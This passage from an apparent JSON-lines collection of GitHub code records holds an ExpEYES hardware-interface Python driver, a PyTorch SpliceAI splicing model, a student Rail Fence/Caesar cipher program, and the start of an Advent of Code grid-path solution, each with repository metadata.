-----------------------------\n def eeprom_write_char(self,addr, dat):\n '''\n Writes one byte to the specified address of the EEPROM memory of ATmega32.\n Used for storing the calibration constants of ADC and DAC.\n WARNING: Using this function may destroy the Calibration Data.\n '''\n self.dwrite(chr(WREEPROM))\n self.dwrite(chr(addr&255))\n self.dwrite(chr(addr>>8))\n self.dwrite(dat)\n res = self.fd.read(1)\n if res != 'D':\n print (_('eeprom write byte error = '), res)\n\n def eeprom_read_block(self, addr, nb): # get nb bytes starting from addr\n '''\n Reads 'nb' bytes starting from the specified address of the EEPROM memory of ATmega32.\n Used for restoring the calibration constants of ADC and DAC.\n '''\n self.dwrite(chr(RDEEPROM))\n self.dwrite(chr(addr&255))\n self.dwrite(chr(addr>>8))\n self.dwrite(chr(nb))\n res = self.fd.read(1)\n if res != 'D':\n print (_('eeprom read block error = '), res)\n dat = self.fd.read(nb)\n return dat\n\n def save_calib(self, ch, m, c): # Saves m & c (8 bytes) to addr ch*8\n '''\n It is possible to reduce the offset and gain errors of the ADC, DAC and the op-amps\n used in the circuit by doing a calibration. The -5V to 5V output is connected to both\n the -5V to +5V inputs before running the calibrate.py program. The output is measured\n with a >= 4.5 digit voltmeter and the calibration constants are stored to the EEPROM.\n WARNING: Using this function may destroy the Calibration Data.\n '''\n addr = ch*8\n s = struct.pack('f'*2, m, c) # pack to floats\n for i in range(2*4):\n self.eeprom_write_char(addr+i, s[i])\n print (ord(s[i]),)\n print()\n self.m[ch] = m\n self.c[ch] = c\n print (_('SC: ch = %d m=%10.6f c=%10.6f')%(ch, self.m[ch], self.c[ch]))\n\n def load_calib(self, ch): # Load m & c from EEPROM\n '''\n Loads the calibration constants from the EEPROM and assigns them to the slope & intercept.\n '''\n res = self.eeprom_read_block(ch*8,8)\n if ord(res[0]) == 255 and ord(res[1]) == 255:\n print (_('BAD Calibration data. 
EEPROM does not have any data '))\n return\n raw = struct.unpack('f'*2, res)\n self.m[ch] = raw[0]\n self.c[ch] = raw[1]\n for c in res: print (ord(c),)\n print()\n print (_('LC: ch = %d m=%10.6f c=%10.6f')%(ch, self.m[ch], self.c[ch]))\n\n def loadall_calib(self):\n self.load_calib(0)\n self.load_calib(1)\n self.load_calib(8)\n\n#------------------------------------ ADC & DAC transactions -----------------------------\n\n def set_current(self, i):\n '''\n Sets the current of the Programmable Current Source.\n Possible to set it from .020 mA to 2 mA, provided the IR drop across the load resistor < 2V\n Returns the voltage at the Current Source Output.\n '''\n if (i < 0.020) or (i > 2.0):\n print (_('ERR:Current must be from 0.02 to 2.0 mA'))\n return None\n i += 0.005 # 5 uA correction is applied. NEED TO SOLVE THIS PROBLEM !!!\n Rc = 1000.0 # Collector Resistance from 5V reference\n v = 5.0 - Rc * i * 1.0e-3 # mA to A\n #print (_('DAC0 to set current = '), v)\n self.set_voltage(1,v)\n return self.get_voltage(6)\n\n def write_dac(self, ch, data):\n '''\n Writes binary data to DAC. Low level routine, generally not used.\n '''\n if (data > 4095): # DAC linearity problem\n data = 4095\n self.dwrite(chr(SETDAC))\n self.dwrite(chr(ch))\n self.dwrite(chr(data&255))\n self.dwrite(chr(data>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n return data\n\n def set_voltage(self, ch, val): # returns the interger send to DAC\n '''\n Sets the voltage outputs. 
Channel 0 is -5V to +5V and channel 1 is 0V to 5V.\n The DAC output goes only upto 4.990 volts.\n '''\n if val > DACMAX: val = DACMAX # Patch for the MCP4922 Problem\n if val < -DACMAX: val = -DACMAX\n iv = int(round(self.m[8+ch]*val + self.c[8+ch]))\n return self.write_dac(ch,iv)\n\n def set_bpv(self, val): # returns the interger send to DAC\n '''\n Sets the Bipolar Voltage Output (T30) from -4.99 to + 4.99 volts\n '''\n return self.set_voltage(0,val)\n\n def set_upv(self, val): # returns the interger send to DAC\n '''\n Sets the Unipolar Voltage Output (T31) from 0 to + 4.99 volts\n '''\n if val < 0: return\n return self.set_voltage(1,val)\n\n def read_adc(self, ch):\n '''\n Reads the specified ADC channel, returns a number from 0 to 4095. Low level routine.\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n res = self.fd.read(1)\n if res != 'D':\n print (_('READADC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n return iv\n\n def get_voltage(self, ch):\n '''\n Reads the specified channel of the ADC. Returns -5V to 5V for channels 0 and 1\n 0V to 5V for other channels.\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n v = self.m[ch] * iv + self.c[ch]\n return v\n\n def get_voltage_time(self, ch):\n '''\n Reads the specified channel of the ADC. Returns -5V to 5V for channels 0 and 1\n 0V to 5V for other channels. Adds the PC time info\n '''\n if (ch > 7):\n print (_('Argument error'))\n return\n self.dwrite(chr(READADC))\n self.dwrite(chr(ch))\n tm = time.time() # Job is sent. 
Now mark the time\n res = self.fd.read(1)\n if res != 'D':\n print (_('WRITEDAC error '), res)\n return\n res = self.fd.read(2)\n iv = ord(res[0]) | (ord(res[1]) << 8)\n v = self.m[ch] * iv + self.c[ch]\n return tm, v\n\n def set_samtime(self, sam):\n '''\n Sets the sampling time of MCP3208 ADC, minimum required is 2 uSec. Give more for high input\n impedance signals.\n '''\n if sam > 250:\n print (_('Sampling time MUST NOT exceed 250 microseconds'))\n return\n self.dwrite(chr(SETSAMTIME))\n self.dwrite(chr(sam))\n res = self.fd.read(1)\n if res != 'D':\n print (_('SETSAMTIME ERROR '), res)\n\n def set_adcsize(self, size):\n '''\n The ADC output is 12 bits (2 bytes space). Capture functions gives the option to discard\n 4 LSBs and return the data in 1 byte, saving space and time.\n '''\n if size > 2:\n print (_('ADC datasize MUST be 1 or 2 bytes'))\n return\n self.dwrite(chr(SETADCSIZE))\n self.dwrite(chr(size))\n res = self.fd.read(1)\n if res != 'D':\n print (_('SETADCSIZE ERROR '), res)\n else:\n self.adcsize = size\n\n\n def capture(self, ch, np, delay):\n '''\n Arguments : channel number , number of samples and timegap between consecutive\n digitizations. 
Returns two lists of size 'np'; time and volatge.\n '''\n if delay < 10:\n return\n if delay < 20:\n self.dwrite(chr(QCAPTURE))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay))\n st = time.time()\n res = self.fd.read(1)\n if res != 'D':\n print (_('QCAPTURE Error '), res, time.time()-st)\n return 0,0\n asize = 1 # adc datasize = 1 for QCAPTURE\n else:\n self.dwrite(chr(CAPTURE))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE error '), res)\n return\n res = self.fd.read(1) # adc_size info from other end\n asize = ord(res)\n nc = asize * np\n data = self.fd.read(nc)\n dl = len(data)\n if dl != nc:\n print (_('CAPTURE: size mismatch '), nc, dl)\n return\n\n ta = []\n va = []\n if ch <= 1: # Channel 0 or 1 (-5V to +5V)\n if asize == 2: # 2 byte dataword\n raw = struct.unpack('H'* np, data) # 2 byte words in the structure\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(self.m[ch] * (raw[i]>>4) + self.c[ch])\n else:\n raw = struct.unpack('B'* np, data) # 1 byte words in the structure\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i]*10.0/255 - 5.0)\n else:\n if asize == 2: # 2 byte dataword\n raw = struct.unpack('H'* np, data) # 16 bit data in uint16 array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append((raw[i]>>4) * 5.0 / 4095)\n else:\n raw = struct.unpack('B'* np, data) # 8 bit data in byte array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i] * 5.0 / 255)\n return ta,va\n\n\n def capture01(self,np, delay):\n '''\n Samples the first two channels 'np' times.\n Time gap between samples is 'delay' usecs.\n If delay < 20, 9 usecs offset between CH0 & CH1, else 17 usecs.\n 
'''\n if delay < 10:\n return\n if delay < 20: # Fast Capture, datasize = 1 byte\n self.dwrite(chr(QCAPTURE01))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE01 error '), res)\n return\n asize = 1\n tg01 = 0.009 # 0.009 milliseconds between CH0 and CH1\n else: # A slow capture\n self.dwrite(chr(CAPTURE01))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE01 error '), res)\n return\n res = self.fd.read(1) # adc_size info from other end\n asize = ord(res)\n tg01 = 0.017 # 0.017 milliseconds between Ch0 & Ch1 digitizations\n\n nb = asize *np * 2 # data from two channels\n data = self.fd.read(nb)\n dl = len(data)\n if dl != nb:\n print (_('CAPTURE01: size mismatch '), nb, dl)\n return\n\n taa = [] # time & voltage arrays for CH0\n vaa = []\n tba = [] # time & voltage arrays for CH1\n vba = []\n if asize == 1: # 1 byte dataword\n raw = struct.unpack('B'* 2*np, data) # 8 bit data in byte array\n for i in range(np):\n taa.append(0.001 * 2 * i * delay)\n vaa.append(raw[2*i] * 10.0 / 255.0 - 5.0)\n tba.append(0.001 * 2 * i * delay + tg01)\n vba.append(raw[2*i +1] * 10.0 / 255.0 - 5.0)\n else:\n raw = struct.unpack('H'* 2*np, data) # 16 bit data in uint16 array\n for i in range(np):\n taa.append(0.001 * 2 * i * delay)\n vaa.append((raw[2*i]>>4) * 10.0 / 4095.0 - 5.0)\n tba.append(0.001 * 2 * i * delay + tg01)\n vba.append((raw[2*i +1]>>4) * 10.0 / 4095.0 - 5.0)\n return taa,vaa,tba,vba\n\n\n def capture_m32(self, ch, np, delay): # Not working properly\n '''\n Capture 'np' samples from the ATmega32 ADC.\n Arguments : channel number , number of samples and timegap between consecutive\n digitizations. 
Returns a list of [time, volatge] coordinates.\n '''\n if delay < 10:\n return\n self.dwrite(chr(CAPTURE_M32))\n self.dwrite(chr(ch))\n self.dwrite(chr(np&255))\n self.dwrite(chr(np>>8))\n self.dwrite(chr(delay&255))\n self.dwrite(chr(delay>>8))\n res = self.fd.read(1)\n if res != 'D':\n print (_('CAPTURE_M32 error '), res)\n return\n asize = 1 # datasize = 1 for CAPTURE_M32\n nc = asize * np\n data = self.fd.read(nc)\n dl = len(data)\n if dl != nc:\n print (_('CAPTURE_M32: size mismatch '), nc, dl)\n return\n\n ta = []\n va = []\n raw = struct.unpack('B'* np, data) # 8 bit data in byte array\n for i in range(np):\n ta.append(0.001 * i * delay) # microseconds to milliseconds\n va.append(raw[i] * 5.0 / 255)\n return ta,va\n\n#------------------- Modifiers for Capture ------------------------------\n def disable_actions(self):\n '''\n Disable all modifiers to the capture call. The capture will try to\n do a self triggering on the ADC input.\n '''\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(0))\n self.dwrite(chr(0))\n self.fd.read(1)\n\n def enable_wait_high(self, pin):\n '''\n Wait for a HIGH on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITHI))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_rising(self, pin):\n '''\n Wait for a rising EDGE on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n print (_('wait_rising '), AWAITRISE)\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITRISE))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_low(self, pin):\n '''\n Wait for a LOW on the speciied 'pin' just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITLO))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_wait_falling(self, pin):\n '''\n Wait for a falling EDGE on the speciied 'pin' 
just before every Capture.\n '''\n if pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n print (_('wait_rising '), AWAITRISE)\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(AWAITFALL))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_set_high(self, pin):\n '''\n Sets the speciied 'pin' HIGH, just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(ASET))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_set_low(self, pin):\n '''\n Sets the speciied 'pin' LOW, just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(ACLR))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_pulse_high(self, pin):\n '''\n Generate a HIGH TRUE Pulse on the speciied 'pin', just before every Capture.\n width is specified by the set_pulsewidth() function.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(APULSEHI))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n def enable_pulse_low(self, pin):\n '''\n Generate a LOW TRUE Pulse on the speciied 'pin', just before every Capture.\n '''\n mask = 1 << pin\n self.dwrite(chr(SETACTION))\n self.dwrite(chr(APULSELO))\n self.dwrite(chr(mask))\n self.fd.read(1)\n\n\n\n#------------------------Time Interval Measurement routines-------------\n def set_pulsepol(self, pol):\n '''\n Sets the 'pulse_polarity' parameter for pulse2rtime()\n pol = 0 means HIGH TRUE pulse\n '''\n self.dwrite(chr(SETPULSEPOL))\n self.dwrite(chr(pol))\n res = self.fd.read(1)\n if res == 'D':\n self.pulse_pol = pol\n\n def set_pulsewidth(self, width):\n '''\n Sets the 'pulse_width' parameter for pulse2rtime() command.\n Also used by usound_time() and the elable_pulse_high/low() functions\n '''\n self.dwrite(chr(SETPULSEWID))\n self.dwrite(chr(width))\n res = self.fd.read(1)\n if res == 'D':\n self.pulse_width = width\n\n def usound_time(self):\n '''\n Used for measuring the velocity of sound. 
Connect the Transmitter Piezo to OD1 (T4).\n The Receiver is connected to the amplifier input T15. This function measures the time\n from a Pulse on ID1 to a signal on T15, in microseconds.\n Use set_pulsewidth() to set the width to 13 microseconds.\n '''\n self.dwrite(chr(USOUND))\n res = self.fd.read(1)\n if res != 'D':\n print (_('Echo error = '),res)\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return low + 50000 * ord(res[2])\n\n def __helper(self, cmd, pin1, pin2): # pins 0 to 3\n '''\n Used by time measurement functions below.\n Make an 8 bit mask from pin1 and pin2.\n First argument (pin1) is encoded in the HIGH half.\n for example pin1 = 2 , pin2 = 0, mask = 0010:0001\n '''\n if pin1 > 4 or pin2 > 4:\n return -1.0\n if pin1 == 4: # Analog Comparator\n hi = 0\n else:\n hi = 1 << (pin1+4) # digin pins\n \n if pin2 == 4: # wait on Analog comparator\n low = 0\n else:\n low = 1 << pin2\n mask = hi | low;\n self.dwrite(chr(cmd))\n self.dwrite(chr(mask))\n res = self.fd.read(1)\n if res != 'D':\n print (_('Time Measurement call Error. 
CMD = '), cmd, res)\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return float(low + 50000 * ord(res[2]))\n \n def r2ftime(self, pin1, pin2):\n '''\n Measures time from a rising edge of pin1 to a falling edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(R2FTIME, pin1, pin2)\n\n def f2rtime(self, pin1, pin2):\n '''\n Measures time from a falling edge of pin1 to a rising edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(F2RTIME, pin1, pin2)\n\n def r2rtime(self, pin1, pin2):\n '''\n Measures time from a rising edge of pin1 to a rising edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(R2RTIME, pin1, pin2)\n\n def f2ftime(self, pin1, pin2):\n '''\n Measures time from a falling edge of pin1 to a falling edge on pin2.\n Pins could be same or distinct.\n '''\n return self.__helper(F2FTIME, pin1, pin2)\n\n def set2ftime(self, op, ip):\n '''\n Measures time from Setting output pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(SET2FTIME, op, ip)\n\n def set2rtime(self, op, ip):\n '''\n Measures time from Setting output pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(SET2RTIME, op, ip)\n\n def clr2rtime(self, op, ip):\n '''\n Measures time from Clearing output pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(CLR2RTIME, op, ip)\n\n def clr2ftime(self, op, ip):\n '''\n Measures time from Clearing output pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(CLR2FTIME, op, ip)\n\n def pulse2rtime(self, op, ip):\n '''\n Measures time from a Pulse on pin 'op' to a HIGH on input pin 'ip'\n '''\n return self.__helper(PULSE2RTIME, op, ip)\n\n def pulse2ftime(self, op, ip):\n '''\n Measures time from a Pulse on pin 'op' to a LOW on input pin 'ip'\n '''\n return self.__helper(PULSE2FTIME, op, ip)\n\n def multi_r2rtime(self, pin , skipcycles=0):\n '''\n Time between two rising edges on the same input pin.\n 
separated by 'skipcycles' number of cycles.\n If skipcycles is zero the period of the waveform is returned.\n '''\n if pin > 4: # ADC inputs\n mask = pin << 4\n elif pin == 4:\n mask = 0\n else:\n mask = 1 << pin\n self.dwrite(chr(MULTIR2R))\n self.dwrite(chr(mask))\n self.dwrite(chr(skipcycles))\n if self.fd.read(1) != 'D':\n return -1.0\n res = self.fd.read(3)\n low = (ord(res[1]) << 8) | ord(res[0])\n return float(low + 50000 * ord(res[2]))\n\n\n def adc2cmp(self, ch): # Route ADC input to comparator (AIN-)\n '''\n Route the specified ADC channel to the Analog Comparator Input (AIN-)\n '''\n self.dwrite(chr(ADC2CMP))\n self.dwrite(chr(ch))\n self.fd.read(1)\n\n#----------------------------- Simple Digital I/O functions ----------------------------\n def write_outputs(self, val):\n '''\n Writes a 2 bit number to the Digital Outputs\n '''\n self.dwrite(chr(DIGOUT))\n self.dwrite(chr(val))\n self.fd.read(1)\n\n def read_inputs(self):\n '''\n Gets a 4 bit number representing the Digital Input voltage Levels\n '''\n self.dwrite(chr(DIGIN))\n res = self.fd.read(1)\n if res != 'D':\n print (_('DIGIN error'))\n return\n res = self.fd.read(1)\n return ord(res) & 15 # 4 LSBs\n\n#-----------DIRECT PORT ACCESS FUNCTIONS (Use only if you know what you are doing)---------\n def set_ddr(self, port, direc):\n self.dwrite(chr(SETDDR))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.dwrite(chr(direc))\n self.fd.read(1)\n return\n\n def set_port(self, port, val):\n self.dwrite(chr(SETPORT))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.dwrite(chr(val))\n self.fd.read(1)\n return\n\n def get_port(self, port):\n self.dwrite(chr(SETPORT))\n self.dwrite(chr(port)) # 0 to 3 for A,B,C and D\n self.fd.read(1)\n data = self.fd.read(1) # get the status byte only\n return ord(data)\n\n#--------------------------------- may go to eyeutils.py ------------------------------\n def minimum(self,va):\n vmin = 1.0e10 # need to change\n for v in va:\n if v < vmin:\n vmin = v\n 
return vmin\n\n def maximum(self,va):\n vmax = 1.0e-10 # need to change\n for v in va:\n if v > vmax:\n vmax = v\n return vmax\n\n def rms(self,va):\n vsum = 0.0\n for v in va:\n vsum += v**2\n v = vsum / len(va)\n return math.sqrt(v)\n\n def mean(self,va):\n vsum = 0.0\n for v in va:\n vsum += v\n v = vsum / len(va)\n return v\n\n def save(self, data, filename = 'plot.dat'):\n '''\n Input data is of the form, [ [x1,y1], [x2,y2],....] where x and y are vectors\n '''\n if data == None: return\n import __builtin__ # Need to do this since 'eyes.py' redefines 'open'\n f = __builtin__.open(filename,'w')\n for xy in data:\n for k in range(len(xy[0])):\n f.write('%5.3f %5.3f\\n'%(xy[0][k], xy[1][k]))\n f.write('\\n')\n f.close()\n\n def grace(self, data, xlab = '', ylab = '', title = ''):\n '''\n Input data is of the form, [ [x1,y1], [x2,y2],....] where x and y are vectors\n '''\n try:\n import pygrace\n global pg\n pg = pygrace.grace()\n for xy in data:\n pg.plot(xy[0],xy[1])\n pg.hold(1) # Do not erase the old data\n pg.xlabel(xlab)\n pg.ylabel(ylab)\n pg.title(title)\n return True\n except:\n return False\n","repo_name":"expeyes/expeyes-programs","sub_path":"expeyes/eyes.py","file_name":"eyes.py","file_ext":"py","file_size_in_byte":40027,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"34898446445","text":"import logging\n\nimport numpy as np\n\nimport torch\nfrom torch import nn\n\n\nclass SpliceAI(nn.Module):\n \"\"\" the base CNN local model based on SpliceAI\"\"\"\n def __init__(self, n_channels, kernel_size, dilation_rate, device='cuda'):\n super(SpliceAI, self).__init__()\n\n self.n_channels = n_channels\n self.kernel_size = kernel_size\n self.dilation_rate = dilation_rate\n\n assert len(self.kernel_size) == len(self.dilation_rate)\n\n self.context_length = 2 * np.sum(\n self.dilation_rate * (self.kernel_size - 1))\n\n self.conv = nn.Conv1d(\n in_channels=4,\n out_channels=self.n_channels,\n 
kernel_size=1).to(device)\n self.skip = nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=1).to(device)\n\n self.residual_blocks = nn.ModuleList()\n self.skip_connections = nn.ModuleList()\n\n # residual blocks\n self.n_blocks = len(self.kernel_size)\n for i in range(self.n_blocks):\n self.residual_blocks.append(\n nn.Sequential(\n nn.BatchNorm1d(self.n_channels),\n nn.ReLU(),\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=self.kernel_size[i],\n dilation=self.dilation_rate[i],\n padding='same'),\n nn.BatchNorm1d(self.n_channels),\n nn.ReLU(),\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=self.kernel_size[i],\n dilation=self.dilation_rate[i],\n padding='same')).to(device)\n )\n\n if ((i + 1) % 4 == 0) or ((i + 1) == len(kernel_size)):\n self.skip_connections.append(\n nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=self.n_channels,\n kernel_size=1).to(device)\n )\n\n self.out = nn.Conv1d(\n in_channels=self.n_channels,\n out_channels=3,\n kernel_size=1).to(device)\n self.out_act = nn.Softmax(dim=1)\n\n def forward(self, input, save_feats):\n\n conv = self.conv(input)\n skip = self.skip(conv)\n\n for i in range(self.n_blocks):\n tmp_conv = self.residual_blocks[i](conv)\n conv = torch.add(conv, tmp_conv)\n if ((i + 1) % 4 == 0) or ((i + 1) == self.n_blocks):\n dense = self.skip_connections[i // 4](conv)\n skip = torch.add(skip, dense)\n\n # discard the padded predictions outside of the window\n x = skip[:, :, self.context_length // 2: -self.context_length // 2]\n\n pred = self.out(x)\n pred = self.out_act(pred)\n return (pred, x, None) if save_feats else (pred, None, None)\n\n\n# ensemble of models for evaluation of trained models\nclass SpliceAIEnsemble(nn.Module):\n def __init__(self, models, window_size):\n super(SpliceAIEnsemble, self).__init__()\n self.models = models\n self.window_size = window_size\n\n def forward(self, 
input):\n\n predictions = torch.zeros(\n size=(len(self.models), input.shape[0], 3, self.window_size)\n )\n\n for ii, model in enumerate(self.models):\n predictions[ii, :, :, :] = model(input)[0].cpu()\n\n combined_predictions = torch.mean(predictions, dim=0)\n\n return combined_predictions, None, None\n","repo_name":"boeselfr/DeepLearningProject","sub_path":"src/splicing/splicing/models/splice_ai.py","file_name":"splice_ai.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16000943580","text":"import time\nimport random\nfrom pathlib import Path\nimport sys\nimport os\nimport socket\nimport RailFenceCipher as R\nimport CaesarCipher as C\n\ndef listToString(s):\n str1 = \"\" # Creating an empty Variable\n for i in s: # add part of the list to the string\n str1 += i\n return str1 # return string\n\nkeys= []\nfor i in range(1,4,1):\n keys.append(2+(i-1)*2)\nos.system( \"attrib -h Keys.txt\" ) # Makes the file visible for writting\nwith open(\"Keys.txt\", 'w') as f:\n f.writelines(str(keys))\n\nwith open(\"Keys.txt\") as f:\n rand_num = f.read()\nos.system( \"attrib +h Keys.txt\" ) # Makes the file hidden to make it inaccessible to users\nrand_num = rand_num.replace(\" \",\"\") # All of\nrand_num = rand_num.replace(\"[\",\"\") # these\nrand_num = rand_num.replace(\"]\",\"\") # are used\nrand_num = rand_num.replace(\",\",\"\") # to remove certain characters so when the \n\nwords = \"Booting up...\"\nfor char in words:\n time.sleep(0.1)\n sys.stdout.write(char)\n sys.stdout.flush()\n\nwords2 = \"\\nWelcome \" + socket.gethostname() + \"!\"\nfor char in words2:\n time.sleep(0.1)\n sys.stdout.write(char)\n sys.stdout.flush()\n\ninput(\"\\nPress 'Enter' to start\\n\")\n\nnew_list = []\ndec_list = []\n\nwhile True:\n state = str(input(\"Do you want to Encrypt or Decrypt?\\n> \")).lower()\n key_num = int(random.choice(rand_num))\n if state == \"encrypt\":\n choice = 
input(\"Do you want to encrypt text or a file?\\n> \").lower()\n if choice == \"string\" or choice == \"text\": # If the user chooses to encrypt via text\n text = input(\"Input the text: \\n> \")\n string = R.encryptRailFence(text, key_num) # Changes the position of the chracters\n list = ([*string]) # Splits the string, so that every chraracter is in its own index in the list\n length = len(string)\n for i in range(length):\n new_list.append(C.key(ord(list[i]),key_num)) # Changes the value of every character\n dec_list.append(chr(new_list[i]))\n print(\"\".join(map(str,dec_list)), end = \" - is the encrypted form\\n\")\n print(\"The cryptography key = \", key_num)\n done = listToString(dec_list)\n elif choice == \"file\": # If the user chooses to encrypt via a file\n file_name = str(input(\"Please enter the file path: \\n> \"))\n file_name = file_name.replace(\"\\\"\",\"\") # Removes the quotations that are placed by windows when you copy a file path\n with open(file_name) as f:\n text = f.read()\n string = R.encryptRailFence(text, key_num)\n print(\"The file contains the string:\",text)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.key(ord(list[i]),key_num))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(done, \"is the encrypted form\")\n print(\"The cryptography key = \", key_num)\n file = input(\"Do you want to save the encrypted form in a file? \\n> \")\n if file == \"Yes\" or file == \"yes\":\n timestr = time.strftime(\"_%d-%m-%Y_%H-%M-%S\") # Reads the time in hh:mm:ss and the date at the time of the program running\n filename_saved = \"encrypted\" + str(timestr) + \".txt\"\n with open(filename_saved, 'w') as f:\n f.write(str(done))\n print(\"File saved as\", filename_saved,\"at\", Path.cwd()) # Path.cwd() prints the path that the file is saved in\n if state == \"decrypt\":\n choice = input(\"Do you want to decrypt text or a file? 
\\n> \").lower()\n if choice == \"file\":\n file_name = str(input(\"Please enter the file path: \\n> \"))\n file_name = file_name.replace(\"\\\"\",\"\")\n with open(file_name) as f:\n text = f.read()\n print(\"The file contains the string:\",text)\n user_key = int(input(\"Enter your cryptography key:\\n> \"))\n string = R.decryptRailFence(text,user_key)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.unkey(ord(list[i]),user_key))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(\"\".join(map(str,dec_list)), end = \" - is the decrypted form\\n\")\n elif choice == \"string\" or choice == \"text\":\n text = input(\"Input the text\\n> \")\n user_key = int(input(\"Enter your cryptography key:\\n> \"))\n string = R.decryptRailFence(text,user_key)\n list = ([*string])\n length = len(string)\n for i in range(length):\n new_list.append(C.unkey(ord(list[i]),user_key))\n dec_list.append(chr(new_list[i]))\n done = listToString(dec_list)\n print(\"\".join(map(str,dec_list)), end = \" - is the decrypted form\\n\")\n file = input(\"Do you want to save the decrypted form in a file? 
\\n> \")\n if file == \"Yes\" or file == \"yes\":\n timestr = time.strftime(\"_%d-%m-%Y_%H-%M-%S\")\n filename_saved = \"decrypted\" + str(timestr) + \".txt\"\n with open(filename_saved, 'w') as f:\n f.write(str(done))\n print(\"File saved as\", filename_saved,\"at\", Path.cwd())\n program_state = str(input(\"Do you want to retry?\\n> \")).lower()\n if program_state == \"yes\":\n new_list = [] # Empties both lists\n dec_list = [] # ↑\n continue\n else:\n break # If the user types anything other than \"yes\", break the loop which will make pyhton go to line 128 (Ending the code)\ninput(\"\\nPress 'Enter' to close\")","repo_name":"BadrElGezeri/Programming-and-Algorithms-1-Coursework-1","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74782727721","text":"import networkx as nx\nfrom utils import read_inputs\nfrom day12_part1 import condition, find_letter\n\nINPUT_FILE = \"2022/inputs/day12.txt\"\n\nif __name__ == \"__main__\":\n # read inputs\n grid_input = read_inputs(INPUT_FILE, split=True)\n num_rows, num_cols = len(grid_input), len(grid_input[0])\n base_grid_graph = nx.grid_2d_graph(num_rows, num_cols)\n\n # build subgraph\n climbing_graph = nx.DiGraph()\n for node1, node2 in base_grid_graph.edges():\n if condition(node1, node2, grid_input):\n climbing_graph.add_edge(node1, node2)\n\n if condition(node2, node1, grid_input):\n climbing_graph.add_edge(node2, node1)\n\n # get start and end\n start = find_letter(grid_input, \"S\")\n end = find_letter(grid_input, \"E\")\n\n # Dijkstra\n shortest_lengths = nx.shortest_path_length(climbing_graph, target=end)\n\n best = None\n for i in range(len(grid_input)):\n for j in range(len(grid_input[0])):\n if (grid_input[i][j] in {\"a\", 